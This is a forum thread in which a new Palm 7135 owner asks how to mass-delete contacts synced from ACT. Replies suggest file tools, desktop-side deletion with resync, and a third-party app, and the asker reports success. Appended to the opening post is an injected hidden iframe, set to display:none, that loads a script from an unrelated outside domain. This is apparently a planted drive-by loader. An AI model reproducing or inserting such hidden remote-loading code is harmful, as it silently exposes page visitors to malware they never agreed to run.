+ Reply to Thread

Help; simple question?

I'm brand new to the world of PDAs (I've been holding out for a good convergence device like my 7135), so this may be a simple question, but I need to know a simple, efficient way to delete about 650 contacts in my 7135. I successfully synced it w/ACT, but, since I'm new to this, it brought over more than I needed. Can anyone please help me w/this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This is really a Palm OS question and not specific to the 7135. You can delete all contacts with a program like Filez

Just delete the entire AddressDB. If you need to select a group, can't you delete (marked selectively) from ACT and resync? I don't use ACT but you have this capability from other desktop PIMs.

All the contacts I want to delete are in the "unfiled" category, and I can't delete/rename that one from the application. Again, I'm brand new to these things, so I am just looking for a simple solution to this issue, and thought that people in this forum would know if it's even possible.

Hey there, I have not used ACT, so I'm not familiar with that side of this question. However, it's often easier to delete things from the PC side, and then resync with your Palm. This is what Beryl is suggesting about deleting a group of entries. The deletions should then be replicated over to the Palm. In the Palm desktop on the PC, you can pull up a category to view, and then select multiple items to do operations on, such as delete. Once again, in the Palm desktop, to select multiple contiguous entries, you click at the top of the set, hold your shift key down, click at the bottom, and everything in between will be highlighted. To select non-contiguous entries, you hold down your control key, and click on the entries you want. Then just delete, or whatever you want to do. I'm not sure of the steps to do this in ACT, but there should be something similar. However, I'm also not clear on whether you are instead trying to set it up so that only some of the entries in ACT are on the Palm, but all remain on the desktop? If so, I'm not sure if you can do that. (You can't from the Palm desktop.) Someone who uses ACT may need to answer you-- perhaps there is documentation with the software, or support on the web site. Good luck!

Mass Transit

I have an app called Mass Transit that I think will do that: http://www.splatbang.com/palm/mt.html. It's worked fine for me, but you should know that it hasn't been touched in about 2 years.

Hmm, it seems the author put a survey on his site last month. Maybe he might try to keep working on it....

Turbocat's suggestion worked. I just had to delete the contacts in the Palm desktop and resync with the conduits for ACT disabled. Thanks everyone.